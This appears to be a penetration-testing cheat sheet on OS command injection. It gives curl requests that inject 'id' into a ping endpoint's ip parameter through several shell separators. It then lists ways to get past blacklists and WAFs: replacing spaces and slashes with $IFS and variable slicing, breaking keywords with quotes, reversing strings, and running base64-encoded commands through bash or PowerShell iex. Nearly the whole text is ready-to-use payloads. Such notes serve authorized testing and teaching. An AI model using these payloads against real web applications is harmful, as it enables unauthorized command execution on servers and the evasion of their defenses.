Command Injection#
We terminate the previous command and run our command
Check each ; %26 %0a %26%26 || | and see if we can get through
## Run 2 commands regardless
curl -s "http://$target/ping?ip=127.0.0.1;id"
## 1st runs on background and runs 2nd
curl -s "http://$target/ping?ip=127.0.0.1%26id"
## Run both %0a is newline '\n'
curl -s "http://$target/ping?ip=127.0.0.1%0aid"
## Run 2nd if 1st success
curl -s "http://$target/ping?ip=127.0.0.1%26%26id"
## Run 2nd if first fail
curl -s "http://$target/ping?ip=127.0.||id"
## Pipe
curl -s "http://$target/ping?ip=127.0.0.1|id"Blacklisted/WAF bypass#
Space %20#
Use tab %09, $IFS, and
Braces {ls.-la}, yes it works with sh, on linux
Forward slash /#
Use ${PATH:0:1}, ${HOME:0:1}, ${PWD:0:1}
Semi-colon ;#
Use ${LS_COLORS:10:1}
Backslash \#
Consider %HOMEPATH is \User\www-data, ~6 is starting position, -9 is the negative end position, which is the negative of number of character in username + 1. (Windows is weird)
echo %HOMEPATH:~6,-11%Same command in powershell
$env:HOMEPATH[0]
$env:PROGRAMFILES[10]Commands#
If WAF is blockinng some commands like whoami, id
Linux sh#
## Quotes doesn't matter to sh
w'h'o'am'i
w"h"o"am"i
## idk
who$@ami
w\ho\am\i
## convert all UPPERCASE to lowercase
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(a="WhOaMi";printf %s "${a,,}")
## Reverse
$(rev<<<'imaohw')
$(echo 'imaohw' | rev)
## Base64 encoded
$(base64 -d<<<d2hvYW1p)
$(echo 'd2hvYW1p' | base64 -d)
bash<<<$(base64 -d<<<d2hvYW1p)
bash<<<$(echo 'd2hvYW1p' | base64 -d)Windows#
who^ami
WhOaMi
## Reverse
iex "$('imaohw'[-1..-20] -join '')"Base64 encoded:
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))or:
echo -n whoami | iconv -t utf-16le | base64Execute:
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"